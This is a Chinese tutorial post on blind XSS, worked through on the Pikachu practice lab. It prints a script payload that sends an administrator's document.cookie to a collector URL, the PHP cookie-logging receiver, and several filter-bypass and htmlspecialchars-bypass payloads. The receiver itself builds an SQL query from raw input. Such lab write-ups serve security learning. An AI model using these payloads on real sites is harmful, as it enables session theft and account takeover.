XSS盲打
Posted liqik
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了XSS盲打相关的知识,希望对你有一定的参考价值。
0x00:XSS盲打
简介
尽可能地于一切可能的地方提交XSS语句,只要后台管理员看到某一条语句,此语句就能被执行。
可以再留言板上留下获取cookie的代码,只要管理员在后台看到,就能获取管理员的cookie。
原理就是你给前台插payload,只要后台管理员浏览过,js代码已经被管理员触发,你Xss平台就会反馈给你信息。
联系平台 pikachu
此站点是 自己接收cookie的站点
payloads
简单测试一下<script>alert(123)</script>
登陆后台测试,产生弹窗
获取cookies payloads
<script>document.location=‘http://192.168.2.211/pikachu-master/pkxss/xcookie/cookie.php?cookie=‘ + document.cookie;</script>
payload的意思就是,获取当前用户cookie,并以参数的方式发送到http://192.168.2.211/pikachu-master/pkxss/xcookie/cookie.php
查看后台获取的结果,获取admin用户的cookie
cookie.php代码:
<?php include_once ‘../inc/config.inc.php‘; include_once ‘../inc/mysql.inc.php‘; $link=connect(); //这个是获取cookie的api页面 if(isset($_GET[‘cookie‘])){ $time=date(‘Y-m-d g:i:s‘); $ipaddress=getenv (‘REMOTE_ADDR‘); $cookie=$_GET[‘cookie‘]; $referer=$_SERVER[‘HTTP_REFERER‘]; $useragent=$_SERVER[‘HTTP_USER_AGENT‘]; $query="insert cookies(time,ipaddress,cookie,referer,useragent) values(‘$time‘,‘$ipaddress‘,‘$cookie‘,‘$referer‘,‘$useragent‘)"; $result=mysqli_query($link, $query); } header("Location:http://127.0.0.1/pikachu-master/index.php");//重定向到一个可信的网站,例如www.baidu.com ?>
学习链接:
https://zhuanlan.zhihu.com/p/25697201
0x01:XSS绕过
0.前端限制——抓包重放/直接F12修改前端代码
1.大小写——<SCriPt>AleRt(test)</ScRipt>
2.拼凑法——<scri<script>pt>alert(test)</scr<srcript>ipt>
3.注释干扰法——<scri<!--test-->pt>alert(test)</scr<!--test-->ipt>
4.编码法——对Payload进行html编码
0x02:htmlspecialchars()
参考:https://www.w3school.com.cn/php/func_string_htmlspecialchars.asp
https://blog.csdn.net/weixin_43716322/article/details/89480895
htmlspecialchars()函数默认只编码双引号,当开发者未对单引号过滤时,就会可能导致XSS的发生(不久之前还跟别人说这个函数很厉害,能当住xss)
payload:
1‘ onclick=‘alert(1)‘
href输出
payloads: javascript:alert(1)
js输出
payload:
</script><script>alert(1)</script>
Done!
以上是关于XSS盲打的主要内容,如果未能解决你的问题,请参考以下文章